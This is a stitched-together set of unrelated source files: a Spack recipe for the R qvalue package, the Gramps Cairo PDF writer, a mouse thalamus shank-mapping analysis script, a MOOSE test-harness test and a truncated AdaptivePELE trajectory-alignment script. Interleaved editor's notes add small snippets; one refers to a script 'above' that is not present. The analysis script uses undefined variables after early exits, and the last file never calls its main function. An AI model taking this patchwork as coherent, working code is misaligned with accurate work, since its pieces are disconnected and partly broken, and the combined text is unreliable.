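Editor's note: the excitation energy printed by the script above is a delta-SCF total-energy difference converted from Hartree to eV; a toy check of that conversion, with hypothetical energies.

HARTREE_TO_EV = 27.211399  # same constant as in the script
e_ground, e_excited = -76.40, -76.12  # hypothetical total energies in Hartree
eex = (e_excited - e_ground) * HARTREE_TO_EV
print("Eex = %.3f eV" % eex)  # 7.619 eV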
# Copyright 2013-2020 Lawrence Livermore National Security, LLC and other # Spack Project Developers. See the top-level COPYRIGHT file for details. # # SPDX-License-Identifier: (Apache-2.0 OR MIT) from spack import * class RQvalue(RPackage): """Q-value estimation for false discovery rate control. This package takes a list of p-values resulting from the simultaneous testing of many hypotheses and estimates their q-values and local FDR values. The q-value of a test measures the proportion of false positives incurred (called the false discovery rate) when that particular test is called significant. The local FDR measures the posterior probability the null hypothesis is true given the test's p-value. Various plots are automatically generated, allowing one to make sensible significance cut-offs. Several mathematical results have recently been shown on the conservative accuracy of the estimated q-values from this software. The software can be applied to problems in genomics, brain imaging, astrophysics, and data mining.""" homepage = "https://bioconductor.org/packages/qvalue" git = "https://git.bioconductor.org/packages/qvalue.git" version('2.16.0', commit='5efbe20ef522a45a7a04b681f72bb9a12e2747ae') version('2.14.1', commit='b694e4b264f25250eb1d1115e70c07f65767c20e') version('2.12.0', commit='7df64ebfcbe69dcbf8b88cb6ef0068bf16979673') version('2.10.0', commit='581e5664b4356440a96310897398f01a98ceb81b') version('2.8.0', commit='c7bf3315619d42d800f57a36670c25a7495ded72') depends_on('r@2.10:', type=('build', 'run')) depends_on('r-ggplot2', type=('build', 'run')) depends_on('r-reshape2', type=('build', 'run'))
rspavel/spack
var/spack/repos/builtin/packages/r-qvalue/package.py
Python
lgpl-2.1
1,762
[ "Bioconductor" ]
e9fd8eb7e32a3217314dd441cdf8af49c6c4baf0ef67cc7afcbc28c305fcff44
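Editor's note: the R package above implements Storey's q-value estimator; as a rough Python analogue only (Benjamini-Hochberg, not Storey's method), false discovery rate control over a vector of p-values looks like this.

import numpy as np
from statsmodels.stats.multitest import multipletests

pvals = np.random.uniform(size=1000)  # p-values from 1000 hypothetical tests
reject, p_adj, _, _ = multipletests(pvals, alpha=0.05, method='fdr_bh')
print('%d tests significant at FDR 0.05' % reject.sum())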
# # Gramps - a GTK+/GNOME based genealogy program # # Copyright (C) 2007 Zsolt Foldvari # Copyright (C) 2008 Brian G. Matherly # # This program is free software; you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation; either version 2 of the License, or # (at your option) any later version. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with this program; if not, write to the Free Software # Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA # # $Id$ """PDF output generator based on Cairo. """ #------------------------------------------------------------------------ # # Python modules # #------------------------------------------------------------------------ from gramps.gen.const import GRAMPS_LOCALE as glocale _ = glocale.get_translation().gettext import sys #------------------------------------------------------------------------ # # Gramps modules # #------------------------------------------------------------------------ import gramps.plugins.lib.libcairodoc as libcairodoc from gramps.gen.plug.docgen import INDEX_TYPE_ALP, INDEX_TYPE_TOC from gramps.gen.errors import ReportError #------------------------------------------------------------------------ # # Set up logging # #------------------------------------------------------------------------ import logging LOG = logging.getLogger(".PdfDoc") #------------------------------------------------------------------------- # # GTK modules # #------------------------------------------------------------------------- from gi.repository import Pango, PangoCairo import cairo #------------------------------------------------------------------------ # # Constants # #------------------------------------------------------------------------ # resolution DPI = 72.0 #------------------------------------------------------------------------ # # PdfDoc class # #------------------------------------------------------------------------ class PdfDoc(libcairodoc.CairoDoc): """Render the document into PDF file using Cairo. """ def run(self): """Create the PDF output. 
""" # get paper dimensions paper_width = self.paper.get_size().get_width() * DPI / 2.54 paper_height = self.paper.get_size().get_height() * DPI / 2.54 page_width = round(self.paper.get_usable_width() * DPI / 2.54) page_height = round(self.paper.get_usable_height() * DPI / 2.54) left_margin = self.paper.get_left_margin() * DPI / 2.54 top_margin = self.paper.get_top_margin() * DPI / 2.54 # create cairo context and pango layout filename = self._backend.filename if sys.version_info[0] < 3: filename = self._backend.filename.encode(glocale.getfilesystemencoding()) try: surface = cairo.PDFSurface(filename, paper_width, paper_height) except IOError as msg: errmsg = "%s\n%s" % (_("Could not create %s") % filename, msg) raise ReportError(errmsg) except Exception as err: errmsg = "%s\n%s" % (_("Could not create %s") % filename, err) raise ReportError(errmsg) surface.set_fallback_resolution(300, 300) cr = cairo.Context(surface) fontmap = PangoCairo.font_map_new() fontmap.set_resolution(DPI) pango_context = fontmap.create_context() options = cairo.FontOptions() options.set_hint_metrics(cairo.HINT_METRICS_OFF) PangoCairo.context_set_font_options(pango_context, options) layout = Pango.Layout(pango_context) PangoCairo.update_context(cr, pango_context) # paginate the document self.paginate_document(layout, page_width, page_height, DPI, DPI) body_pages = self._pages # build the table of contents and alphabetical index toc_page = None index_page = None toc = [] index = {} for page_nr, page in enumerate(body_pages): if page.has_toc(): toc_page = page_nr if page.has_index(): index_page = page_nr for mark in page.get_marks(): if mark.type == INDEX_TYPE_ALP: if mark.key in index: if page_nr + 1 not in index[mark.key]: index[mark.key].append(page_nr + 1) else: index[mark.key] = [page_nr + 1] elif mark.type == INDEX_TYPE_TOC: toc.append([mark, page_nr + 1]) # paginate the table of contents rebuild_required = False if toc_page is not None: toc_pages = self.__generate_toc(layout, page_width, page_height, toc) offset = len(toc_pages) - 1 if offset > 0: self.__increment_pages(toc, index, toc_page, offset) rebuild_required = True else: toc_pages = [] # paginate the index if index_page is not None: index_pages = self.__generate_index(layout, page_width, page_height, index) offset = len(index_pages) - 1 if offset > 0: self.__increment_pages(toc, index, index_page, offset) rebuild_required = True else: index_pages = [] # rebuild the table of contents and index if required if rebuild_required: if toc_page is not None: toc_pages = self.__generate_toc(layout, page_width, page_height, toc) if index_page is not None: index_pages = self.__generate_index(layout, page_width, page_height, index) # render the pages if toc_page is not None: body_pages = body_pages[:toc_page] + toc_pages + \ body_pages[toc_page+1:] if index_page is not None: body_pages = body_pages[:index_page] + index_pages + \ body_pages[index_page+1:] self._pages = body_pages for page_nr in range(len(self._pages)): cr.save() cr.translate(left_margin, top_margin) self.draw_page(page_nr, cr, layout, page_width, page_height, DPI, DPI) cr.show_page() cr.restore() # close the surface (file) surface.finish() def __increment_pages(self, toc, index, start_page, offset): """ Increment the page numbers in the table of contents and index. 
""" for n, value in enumerate(toc): page_nr = toc[n][1] toc[n][1] = page_nr + (offset if page_nr > start_page else 0) for key, value in index.items(): index[key] = [page_nr + (offset if page_nr > start_page else 0) for page_nr in value] def __generate_toc(self, layout, page_width, page_height, toc): """ Generate the table of contents. """ self._doc = libcairodoc.GtkDocDocument() self._active_element = self._doc self._pages = [] write_toc(toc, self) self.paginate_document(layout, page_width, page_height, DPI, DPI) return self._pages def __generate_index(self, layout, page_width, page_height, index): """ Generate the index. """ self._doc = libcairodoc.GtkDocDocument() self._active_element = self._doc self._pages = [] write_index(index, self) self.paginate_document(layout, page_width, page_height, DPI, DPI) return self._pages def write_toc(toc, doc): """ Write the table of contents. """ if not toc: return doc.start_paragraph('TOC-Title') doc.write_text(_('Contents')) doc.end_paragraph() doc.start_table('toc', 'TOC-Table') for mark, page_nr in toc: doc.start_row() doc.start_cell('TOC-Cell') if mark.level == 1: style_name = "TOC-Heading1" elif mark.level == 2: style_name = "TOC-Heading2" else: style_name = "TOC-Heading3" doc.start_paragraph(style_name) doc.write_text(mark.key) doc.end_paragraph() doc.end_cell() doc.start_cell('TOC-Cell') doc.start_paragraph(style_name) doc.write_text(str(page_nr)) doc.end_paragraph() doc.end_cell() doc.end_row() doc.end_table() def write_index(index, doc): """ Write the alphabetical index. """ if not index: return doc.start_paragraph('IDX-Title') doc.write_text(_('Index')) doc.end_paragraph() doc.start_table('index', 'IDX-Table') for key in sorted(index.keys()): doc.start_row() doc.start_cell('IDX-Cell') doc.start_paragraph('IDX-Entry') doc.write_text(key) doc.end_paragraph() doc.end_cell() doc.start_cell('IDX-Cell') doc.start_paragraph('IDX-Entry') pages = [str(page_nr) for page_nr in index[key]] doc.write_text(', '.join(pages)) doc.end_paragraph() doc.end_cell() doc.end_row() doc.end_table()
Forage/Gramps
gramps/plugins/docgen/pdfdoc.py
Python
gpl-2.0
9,784
[ "Brian" ]
8a27c0e0990a6b162a5d9d96765d9f5e117e97d8ac85cb635819a5366bc153d5
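Editor's note: a toy illustration of the page-offset arithmetic that `__increment_pages` above performs when the paginated TOC grows beyond one page; the values are hypothetical.

toc = [['Chapter 1', 2], ['Chapter 2', 7]]  # [mark, page_nr] pairs
start_page = 0   # the TOC occupies the first body page
offset = 2       # the TOC paginated to three pages, i.e. two extra

# Every entry that points past the TOC's own page shifts by the offset.
for entry in toc:
    if entry[1] > start_page:
        entry[1] += offset

print(toc)  # [['Chapter 1', 4], ['Chapter 2', 9]]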
#!/usr/bin/env python ''' File name: main_make_map.py Author: Guillaume Viejo Date created: 28/09/2017 Python Version: 3.5.2 To make shank mapping ''' import numpy as np import pandas as pd # from matplotlib.pyplot import plot,show,draw import scipy.io from functions import * from pylab import * from sklearn.decomposition import PCA import _pickle as cPickle ############################################################################################################### # LOADING DATA ############################################################################################################### data_directory = '/mnt/DataGuillaume/MergedData/' datasets = np.loadtxt(data_directory+'datasets_ThalHpc.list', delimiter = '\n', dtype = str, comments = '#') theta_mod, theta_ses = loadThetaMod('/mnt/DataGuillaume/MergedData/THETA_THAL_mod.pickle', datasets, return_index=True) swr_mod, swr_ses = loadSWRMod('/mnt/DataGuillaume/MergedData/SWR_THAL_corr.pickle', datasets, return_index=True) spind_mod, spind_ses = loadSpindMod('/mnt/DataGuillaume/MergedData/SPINDLE_mod.pickle', datasets, return_index=True) nbins = 400 binsize = 5 times = np.arange(0, binsize*(nbins+1), binsize) - (nbins*binsize)/2 swr = pd.DataFrame( index = swr_ses, columns = times, data = swr_mod) phase = pd.DataFrame(index = theta_ses['wake'], columns = ['theta_wake', 'theta_rem', 'spindle_hpc', 'spindle_thl']) phase.loc[theta_ses['wake'],'theta_wake'] = theta_mod['wake'][:,0] phase.loc[theta_ses['rem'], 'theta_rem'] = theta_mod['rem'][:,0] phase.loc[spind_ses['hpc'], 'spindle_hpc'] = spind_mod['hpc'][:,0] phase.loc[spind_ses['thl'], 'spindle_thl'] = spind_mod['thl'][:,0] pvalue = pd.DataFrame(index = theta_ses['wake'], columns = ['theta_wake', 'theta_rem', 'spindle_hpc', 'spindle_thl']) pvalue.loc[theta_ses['wake'], 'theta_wake'] = theta_mod['wake'][:,1] pvalue.loc[theta_ses['rem'], 'theta_rem'] = theta_mod['rem'][:,1] pvalue.loc[spind_ses['hpc'], 'spindle_hpc'] = spind_mod['hpc'][:,1] pvalue.loc[spind_ses['thl'], 'spindle_thl'] = spind_mod['thl'][:,1] kappa = pd.DataFrame(index = theta_ses['wake'], columns = ['theta_wake', 'theta_rem', 'spindle_hpc', 'spindle_thl']) kappa.loc[theta_ses['wake'], 'theta_wake'] = theta_mod['wake'][:,2] kappa.loc[theta_ses['rem'], 'theta_rem'] = theta_mod['rem'][:,2] kappa.loc[spind_ses['hpc'], 'spindle_hpc'] = spind_mod['hpc'][:,2] kappa.loc[spind_ses['thl'], 'spindle_thl'] = spind_mod['thl'][:,2] # filtering swr_mod swr = pd.DataFrame( index = swr.index, columns = swr.columns, data = gaussFilt(swr.values, (10,))) # Cut swr_mod from -500 to 500 nbins = 200 binsize = 5 times = np.arange(0, binsize*(nbins+1), binsize) - (nbins*binsize)/2 swr = swr.loc[:,times] # CHECK FOR NAN tmp1 = swr.index[swr.isnull().any(1).values] # copy and delete if len(tmp1): swr_modth = swr.drop(tmp1) ############################################################################################################### # MOVIE + jPCA for each animal ############################################################################################################### mouses = ['Mouse12', 'Mouse17', 'Mouse20', 'Mouse32'] # times = np.arange(0, 1005, 5) - 500 # BAD interval_to_cut = { 'Mouse12':[89,128], 'Mouse17':[84,123], 'Mouse20':[92,131], 'Mouse32':[80,125]} rXX = dict.fromkeys(mouses) maps = dict.fromkeys(mouses) headdir = dict.fromkeys(mouses) adnloc = dict.fromkeys(mouses) xpos = dict.fromkeys(mouses) ypos = dict.fromkeys(mouses) xpos_shank = dict.fromkeys(mouses) ypos_shank = dict.fromkeys(mouses) xpos_phase = dict.fromkeys(mouses) 
ypos_phase = dict.fromkeys(mouses) for m in mouses: depth = pd.DataFrame(index = np.genfromtxt(data_directory+m+"/"+m+".depth", dtype = 'str', usecols = 0), data = np.genfromtxt(data_directory+m+"/"+m+".depth", usecols = 1), columns = ['depth']) neurons = np.array([n for n in swr_modth.index if m in n]) rX,phi_swr,dynamical_system = jPCA(swr_modth.loc[neurons].values, times) phi_swr = pd.DataFrame(index = swr_modth.loc[neurons].index, data = phi_swr) sessions = np.unique([n.split("_")[0] for n in neurons]) swr_shank = np.zeros((len(sessions),8,len(times))) nb_bins = interval_to_cut[m][1] - interval_to_cut[m][0] theta_shank = np.zeros((len(sessions),8,nb_bins)) # that's radian bins here spindle_shank = np.zeros((len(sessions),8,nb_bins)) # that's radian bins here bins_phase = np.linspace(-np.pi, np.pi+0.00001, nb_bins+1) # positive and negative modulation for each mouse # bornsup = np.percentile(swr_modth.loc[neurons], 70) # borninf = np.percentile(swr_modth.loc[neurons], 30) bornsup = 0.0 borninf = 0.0 neurons_pos = np.array([n for n in swr_modth.index if m in n and swr_modth.loc[n,0] > bornsup]) neurons_neg = np.array([n for n in swr_modth.index if m in n and swr_modth.loc[n,0] < borninf]) count_positive = np.zeros((len(sessions),8)) count_negative = np.zeros((len(sessions),8)) count_total = np.zeros((len(sessions),8)) hd_neurons = np.zeros((len(sessions),8)) amplitute = np.zeros((len(sessions),8)) phase_shank = np.zeros((len(sessions),8)) kappa_shank = np.zeros((len(sessions),8)) coherence_shank = np.zeros((len(sessions),8)) # map neuron to a session and a shank with a dual index for s in sessions: shank = loadShankMapping(data_directory+m+'/'+s+'/Analysis/SpikeData.mat').flatten() shankIndex = np.array([shank[int(n.split("_")[1])]-1 for n in neurons if s in n]) if np.max(shankIndex) > 8 : sys.exit("Invalid shank index for thalamus" + s) hd_info = scipy.io.loadmat(data_directory+m+'/'+s+'/Analysis/HDCells.mat')['hdCellStats'][:,-1] hd_info_neuron = np.array([hd_info[int(n.split("_")[1])] for n in neurons if s in n]) neurons_in_session = np.array([n for n in neurons if s in n]) shank_to_neurons = {k:[n for n in neurons_in_session[shankIndex == k]] for k in np.unique(shankIndex)} ########################################################################################################### # SWR MOD ########################################################################################################### for k in shank_to_neurons.keys(): count_total[np.where(sessions== s)[0][0],k] = len(shank_to_neurons[k]) hd_neurons[np.where(sessions== s)[0][0],k] = np.sum(hd_info_neuron[shankIndex == k]) amplitute[np.where(sessions==s)[0][0],k] = (swr_modth.loc[shank_to_neurons[k]].var(1)).mean() mu_, kappa_, pval_ = getCircularMean(phi_swr.loc[shank_to_neurons[k]].values.flatten(), 2*np.pi, 0.0) phase_shank[np.where(sessions==s)[0][0],k] = mu_ if np.isnan(mu_): sys.exit("mu_") kappa_shank[np.where(sessions==s)[0][0],k] = kappa_ coherence_shank[np.where(sessions==s)[0][0],k] = getPhaseCoherence(phi_swr.loc[shank_to_neurons[k]].values.flatten()) for t in range(len(times)): swr_shank[np.where(sessions== s)[0][0],k,t] = np.mean(swr_modth.loc[shank_to_neurons[k],times[t]]) # positive swr mod neurons_pos_in_session = np.array([n for n in neurons_pos if s in n]) shankIndex_pos = np.array([shank[int(n.split("_")[1])]-1 for n in neurons_pos_in_session]) shank_to_neurons_pos = {k:[n for n in neurons_pos_in_session[shankIndex_pos == k]] for k in np.unique(shankIndex_pos)} for k in shank_to_neurons_pos.keys(): 
count_positive[np.where(sessions== s)[0][0],k] = float(len(shank_to_neurons_pos[k]))
			# negative swr mod
			neurons_neg_in_session = np.array([n for n in neurons_neg if s in n])
			shankIndex_neg = np.array([shank[int(n.split("_")[1])]-1 for n in neurons_neg_in_session])
			shank_to_neurons_neg = {k:[n for n in neurons_neg_in_session[shankIndex_neg == k]] for k in np.unique(shankIndex_neg)}
			for k in shank_to_neurons_neg.keys():
				count_negative[np.where(sessions== s)[0][0],k] = float(len(shank_to_neurons_neg[k]))

	phase_shank = np.flip(phase_shank, 1)
	amplitute = np.flip(amplitute, 1)
	kappa_shank = np.flip(kappa_shank, 1)
	coherence_shank = np.flip(coherence_shank, 1)
	# normalize by number of neurons per shanks
	count_positive = count_positive/(count_total+1.0)
	count_negative = count_negative/(count_total+1.0)
	hd_neurons = hd_neurons/(count_total+1.0)
	rXX[m] = rX
	maps[m] = {	'positive':	np.flip(count_positive,1),
				'negative':	np.flip(count_negative,1),
				'total':	np.flip(count_total,1),
				'amplitute':	amplitute,
				'phase':	phase_shank,
				'kappa':	kappa_shank,
				'coherence':	coherence_shank,
				'x':		np.arange(0.0, 8*0.2, 0.2),
				'y':		depth.loc[sessions].values.flatten()}
	headdir[m] = np.flip(hd_neurons, 1)

# # where is adn
# ind_max = np.where(hd_neurons == np.max(hd_neurons))
# adnloc[m] = [ypos[m][ind_max[0][0]], xpos[m][ind_max[1][0]]]

def interpolate(z, x, y, inter, bbox = None):
	xnew = np.arange(x.min(), x.max()+inter, inter)
	ynew = np.arange(y.min(), y.max()+inter, inter)
	if bbox == None:
		f = scipy.interpolate.RectBivariateSpline(y, x, z)
	else:
		f = scipy.interpolate.RectBivariateSpline(y, x, z, bbox = bbox)
	znew = f(ynew, xnew)
	return (xnew, ynew, znew)

def filter_(z, n):
	from scipy.ndimage import gaussian_filter
	return gaussian_filter(z, n)

def softmax(x, b1 = 20.0, b2 = 0.5):
	x -= x.min()
	x /= x.max()
	return 1.0/(1.0+np.exp(-(x-b2)*b1))

def get_rgb(mapH, mapV, mapS, bound, m):
	beta_total = {	'Mouse12':[40.0,0.25],
					'Mouse17':[40.0,0.2],
					'Mouse20':[40.0,0.2],
					'Mouse32':[100.0,0.3]}
	beta_coh = {	'Mouse12':[50.0,0.3],
					'Mouse17':[20.0,0.3],
					'Mouse20':[20.0,0.3],
					'Mouse32':[90.0,0.4]}
	# mapH : phase
	# mapV : total
	# mapS : coherence
	from matplotlib.colors import hsv_to_rgb
	mapH -= mapH.min()
	mapH /= mapH.max()
	mapV -= mapV.min()
	mapV /= mapV.max()
	mapS -= mapS.min()
	mapS /= mapS.max()
	mapV = softmax(mapV, beta_total[m][0], beta_total[m][1])
	mapS = softmax(mapS, beta_coh[m][0], beta_coh[m][1])
	H = (1-mapH)*bound
	S = mapS
	V = mapV
	HSV = np.dstack((H,S,V))
	RGB = hsv_to_rgb(HSV)
	return RGB

for m in mouses:
	figure()
	interval = 0.01
	xnew, ynew, amp = interpolate(maps[m]['amplitute'].copy(), maps[m]['x'], maps[m]['y'], interval)
	xnew, ynew, total = interpolate(maps[m]['total'].copy(), maps[m]['x'], maps[m]['y'], interval)
	xnew, ynew, sinn = interpolate(np.sin(maps[m]['phase'].copy()), maps[m]['x'], maps[m]['y'], interval)
	xnew, ynew, coss = interpolate(np.cos(maps[m]['phase'].copy()), maps[m]['x'], maps[m]['y'], interval)
	xnew, ynew, coh = interpolate(maps[m]['coherence'].copy(), maps[m]['x'], maps[m]['y'], interval)
	xnew, ynew, pos = interpolate(maps[m]['positive'].copy(), maps[m]['x'], maps[m]['y'], interval)
	xnew, ynew, neg = interpolate(maps[m]['negative'].copy(), maps[m]['x'], maps[m]['y'], interval)
	xnew, ynew, head = interpolate(headdir[m].copy(), maps[m]['x'], maps[m]['y'], interval)
	phi = np.arctan2(sinn, coss) # phase map rebuilt from its interpolated sine/cosine components
	imshow(get_rgb(phi.copy(), total.copy(), np.ones_like(pos), 0.83, m), aspect = 'equal',origin = 'upper', extent = (xnew[0], xnew[-1], ynew[-1], ynew[0]))
	head[head < np.percentile(head, 90)] = 0.0
	contour(head, aspect = 
'equal',origin = 'upper', extent = (xnew[0], xnew[-1], ynew[-1], ynew[0])) savefig("../figures/map_modulation_"+m+".pdf") sys.exit() sys.exit() # arrows for m in mouses: figure() xnew, ynew, amp = interpolate(maps[m]['amplitute'].copy(), maps[m]['x'], maps[m]['y'], 0.01) amp = filter_(amp, 5) xnew, ynew, total = interpolate(maps[m]['total'].copy(), maps[m]['x'], maps[m]['y'], 0.01) total = filter_(total, 5) xnew, ynew, coh = interpolate(maps[m]['coherence'].copy(), maps[m]['x'], maps[m]['y'], 0.01) coh = filter_(coh, 5) imshow(get_rgb(amp.copy(), total.copy(), coh.copy(), 0.83), aspect = 'equal',origin = 'upper', extent = (xnew[0], xnew[-1], ynew[-1], ynew[0])) xnew, ynew, sinn = interpolate(np.sin(maps[m]['phase'].copy()), maps[m]['x'], maps[m]['y'], 0.06) xnew, ynew, coss = interpolate(np.cos(maps[m]['phase'].copy()), maps[m]['x'], maps[m]['y'], 0.06) xnew, ynew, coh = interpolate(maps[m]['coherence'].copy(), maps[m]['x'], maps[m]['y'], 0.06) coh = filter_(coh, 5) X, Y = np.meshgrid(xnew, ynew) quiver(X, Y, coss*coh, sinn*coh, units = 'xy', linewidth = 100) xnew, ynew, head = interpolate(headdir[m].copy(), maps[m]['x'], maps[m]['y'], 0.01) head[head < np.percentile(head, 90)] = 0.0 contour(head, aspect = 'equal',origin = 'upper', extent = (xnew[0], xnew[-1], ynew[-1], ynew[0])) # savefig("../figures/map_phase_"+m+".pdf") # from matplotlib import animation, rc # from IPython.display import HTML, Image # m = mouses[0] # rc('animation', html='html5') # fig, axes = plt.subplots(1,3) # images1 = [] # for i,e in zip(range(3),['swr','spindle','theta']): # images1.append(axes[i].imshow(movies[m][e][0], aspect = 'equal', cmap = 'jet')) # axes[i].set_title(e) # def init(): # for i,e in zip(range(3),['swr','spindle','theta']): # images1[i].set_data(movies[m][e][0]) # return images1 # def animate(t): # for i,e in zip(range(3),['swr','spindle','theta']): # images1[i].set_data(movies[m][e][t]) # return images1 # anim = animation.FuncAnimation(fig, animate, init_func=init, # frames=interval_to_cut[m][1]-interval_to_cut[m][0], interval=0, blit=True, repeat_delay = 0) # show() # anim.save('../figures/animation_swr_mod_jpca.gif', writer='imagemagick', fps=60) #################################################################################### # MAPS #################################################################################### # figure(figsize = (16,10)) # for i, m in zip(range(len(mouses)), mouses): # subplot(1,4,i+1) m = 'Mouse12' imshow(get_rgb(maps[m]['amplitute'].copy(), maps[m]['total'].copy()), aspect = 'equal',origin = 'upper', extent = (xpos[m][0], xpos[m][-1], ypos[m][-1], ypos[m][0])) xticks(xpos[m][np.arange(0, maps[m]['amplitute'].shape[1],20)]) yticks(ypos[m][np.arange(0, maps[m]['amplitute'].shape[0],20)]) X, Y = np.meshgrid(xpos_phase[m], ypos_phase[m]) quiver(X, Y, np.cos(maps[m]['phase'])*maps[m]['coherence'], np.sin(maps[m]['phase'])*maps[m]['coherence']) headdir[m][headdir[m] < np.percentile(headdir[m], 80)] = 0.0 contour(headdir[m]) show() sys.exit() title(m) savefig("../figures/map_mouse12_phase.pdf") # savefig("../figures/map_swr_density_neurons.pdf") show() sys.exit() figure(figsize = (16,10)) for i, m in zip(range(len(mouses)), mouses): subplot(2,4,i+1) imshow(get_rgb(maps[m]['positive'], maps[m]['total']), aspect = 'equal') headdir[m][headdir[m] < np.percentile(headdir[m], 80)] = 0.0 contour(headdir[m]) xticks(np.arange(0, maps[m]['positive'].shape[1],20), xpos[m][np.arange(0, maps[m]['positive'].shape[1],20)]) yticks(np.arange(0, maps[m]['positive'].shape[0],20), 
ypos[m][np.arange(0, maps[m]['positive'].shape[0],20)]) title(m) subplot(2,4,i+5) imshow(get_rgb(maps[m]['negative'], maps[m]['total']), aspect = 'equal') contour(headdir[m]) xticks(np.arange(0, maps[m]['negative'].shape[1],20), xpos[m][np.arange(0, maps[m]['negative'].shape[1],20)]) yticks(np.arange(0, maps[m]['negative'].shape[0],20), ypos[m][np.arange(0, maps[m]['negative'].shape[0],20)]) savefig("../figures/map_swr_density_neurons.pdf") show() figure(figsize = (16,10)) for i, m in zip(range(len(mouses)), mouses): subplot(1,4,i+1) imshow(headdir[m], cmap = 'jet', aspect = 'equal') xticks(np.arange(0, headdir[m].shape[1],20), xpos[m][np.arange(0, headdir[m].shape[1],20)]) yticks(np.arange(0, headdir[m].shape[0],20), ypos[m][np.arange(0, headdir[m].shape[0],20)]) title(m+"\n y="+str(np.around(adnloc[m][0],2))+"\n"+"x="+str(np.around(adnloc[m][1],2))) savefig("../figures/map_adn_location.pdf") show() # SWR MOD from matplotlib import animation, rc from IPython.display import HTML, Image rc('animation', html='html5') fig, axes = plt.subplots(2,4) lines1 = [] lines2 = [] images = [] for i in range(len(mouses)): lines1.append(axes[0,i].plot([],[],'o-')[0]) lines2.append(axes[0,i].plot([],[],'o-')[0]) axes[0,i].set_xlim(-500, 500) axes[0,i].set_ylim(rXX[mouses[i]].min(), rXX[mouses[i]].max()) images.append(axes[1,i].imshow(movies[mouses[i]][0], aspect = 'auto', cmap = 'jet')) def init(): for i, m in zip(range(len(mouses)), mouses): images[i].set_data(movies[m][0]) lines1[i].set_data(times[0], rXX[m][0,0]) lines2[i].set_data(times[0], rXX[m][0,1]) return images+lines1+lines2 def animate(t): for i, m in zip(range(len(mouses)), mouses): images[i].set_data(movies[m][t]) lines1[i].set_data(times[0:t], rXX[m][0:t,0]) lines2[i].set_data(times[0:t], rXX[m][0:t,1]) return images+lines1+lines2 anim = animation.FuncAnimation(fig, animate, init_func=init, frames=len(movie), interval=10, blit=True, repeat_delay = 1000) show() # anim.save('../figures/animation_swr_mod_jpca.gif', writer='imagemagick', fps=60)
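
# ---------------------------------------------------------------------------
# Hedged usage sketch (added for illustration, not part of the original
# analysis): how interpolate()/softmax()/get_rgb() compose on synthetic
# per-shank values. Grid sizes, depths and the 'Mouse12' beta key are
# assumptions; a varying saturation map is used because an all-ones map
# would hit a divide-by-zero in get_rgb's normalisation.
import scipy.interpolate # for RectBivariateSpline; may already come in via functions
def _example_rgb_map():
	z = np.random.rand(10, 8) # fake (session x shank) values
	x = np.arange(0.0, 8*0.2, 0.2) # shank positions, same spacing as maps[m]['x']
	y = np.linspace(0.0, 2.0, 10) # fake recording depths
	xn, yn, zn = interpolate(z, x, y, 0.01) # spline upsampling to a fine grid
	sat = np.random.rand(*zn.shape) # illustrative saturation channel
	return get_rgb(zn.copy(), zn.copy(), sat, 0.83, 'Mouse12')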
gviejo/ThalamusPhysio
python/main_make_map_pos_neg.py
Python
gpl-3.0
16,953
[ "NEURON" ]
3fe47c92c72fa1abbff62c5afda7e6ad1ff54c762d967311a530014d29398c40
#* This file is part of the MOOSE framework #* https://www.mooseframework.org #* #* All rights reserved, see COPYRIGHT for full restrictions #* https://github.com/idaholab/moose/blob/master/COPYRIGHT #* #* Licensed under LGPL 2.1, please see LICENSE for details #* https://www.gnu.org/licenses/lgpl-2.1.html import subprocess from TestHarnessTestCase import TestHarnessTestCase class TestHarnessTester(TestHarnessTestCase): def testDuplicateTestNames(self): """ Test for duplicate test names """ # Duplicate tests are considered a Fatal Parser Error, hence the 'with assertRaises' with self.assertRaises(subprocess.CalledProcessError) as cm: self.runTests('-i', 'duplicate_test_names', '--no-color') e = cm.exception self.assertRegexpMatches(e.output.decode('utf-8'), r'tests/test_harness.*? \[DUPLICATE TEST\] SKIP') self.assertRegexpMatches(e.output.decode('utf-8'), r'tests/test_harness.*?OK')
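
# Hedged sketch (added for illustration, not part of the upstream suite): on
# Python 3 the deprecated assertRegexpMatches alias used above is spelled
# assertRegex; same spec file and flags, everything else unchanged.
#
#     output = e.output.decode('utf-8')
#     self.assertRegex(output, r'tests/test_harness.*? \[DUPLICATE TEST\] SKIP')
#     self.assertRegex(output, r'tests/test_harness.*?OK')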
nuclear-wizard/moose
python/TestHarness/tests/test_DuplicateTestNames.py
Python
lgpl-2.1
981
[ "MOOSE" ]
ed5207065e2971a0cda91db02d57765e796b6d2391562531490da13ac882ca71
from __future__ import print_function
import argparse

import mdtraj as md
import multiprocessing as mp

import AdaptivePELE.analysis.trajectory_processing as tp


def parseArguments():
    desc = "Program that extracts residue coordinates for subsequent MSM analysis."
    parser = argparse.ArgumentParser(description=desc)
    parser.add_argument("--dont_image", action="store_false", help="Flag to set whether trajectories should be imaged before the alignment (if not specified performs the imaging)")
    parser.add_argument("--offset", type=int, default=0, help="Offset to add to trajectory number")
    parser.add_argument("--processors", type=int, default=4, help="Number of cpus to use")
    parser.add_argument("resname", help="Ligand resname")
    parser.add_argument("reference", help="Reference structure")
    parser.add_argument("topology", help="Glob string for the topology")
    parser.add_argument("trajectories", help="Glob string for the trajectories")
    args = parser.parse_args()
    return args.trajectories, args.resname, args.topology, args.reference, args.processors, args.offset, args.dont_image


def process_traj(traj, top, ligand_name, reference, num, image=True):
    reference = md.load(reference)
    reference = tp.dehidratate(reference)
    md_traj = md.load(traj, top=top)
    if image:
        md_traj = md_traj.image_molecules()
    nowat_traj = tp.dehidratate(md_traj)
    aligned_traj = nowat_traj.superpose(reference, frame=0, atom_indices=tp.extract_heavyatom_indexes(nowat_traj), ref_atom_indices=tp.extract_heavyatom_indexes(reference))
    aligned_traj.save_xtc("trajectory_aligned_%s.xtc" % num)
    if num == 0:
        aligned_traj[0].save_pdb("top%s.pdb" % ligand_name)


def main(trajectory_template, ligand_name, topology, reference, processors, off_set, image):
    pool = mp.Pool(processors)
    workers = []
    num = off_set
    for traj, top in tp.load_trajs(trajectory_template, topology, PELE_order=True):
        print("Processing %s num %s with top %s" % (traj, num, top))
        workers.append(pool.apply_async(process_traj, args=(traj, top, ligand_name, reference, num, image)))
        num = num + 1
    for worker in workers:
        worker.get()


if __name__ == "__main__":
    trajectory_template, ligand_name, topology, reference, processors, off_set, image = parseArguments()
